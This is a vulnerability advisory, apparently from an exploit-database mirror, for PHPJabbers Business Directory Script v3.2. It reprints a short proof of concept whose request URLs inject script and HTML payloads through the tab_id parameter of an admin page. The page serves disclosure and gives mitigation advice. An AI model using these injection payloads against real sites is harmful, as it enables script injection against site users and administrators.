PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities

vendor:

Business Directory Script

by:

Kerimcan Ozturk

5.5

CVSS

MEDIUM

Cross-Site Scripting (XSS), Cross-Site Request Forgery

CWE

Product Name: Business Directory Script

Affected Version From: 3.2

Affected Version To: 3.2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro

2023

PHPJabbers Business Directory Script v3.2 – Multiple Vulnerabilities

The PHPJabbers Business Directory Script v3.2 is vulnerable to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. An attacker can exploit these vulnerabilities to perform malicious actions or steal sensitive information.

Mitigation:

To mitigate these vulnerabilities, it is recommended to apply the latest patch or update provided by the vendor. Additionally, input validation and output encoding should be implemented to prevent XSS attacks. CSRF tokens should also be used to protect against CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
# Date: 09/08/2023
# Exploit Author: Kerimcan Ozturk
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/business-directory-script/
# Version: 3.2
# Tested on: Windows 10 Pro
## Description

Technical Detail / POC
==========================
Login Account
Go to Property Page (
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
Edit Any Property (
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57
)

[1] Cross-Site Scripting (XSS)

Request:
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
"<script><image/src/onerror=prompt(8)>

[2] Cross-Site Request Forgery

Request:
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
"<script><font%20color="green">Kerimcan%20Ozturk</font>

Best Regards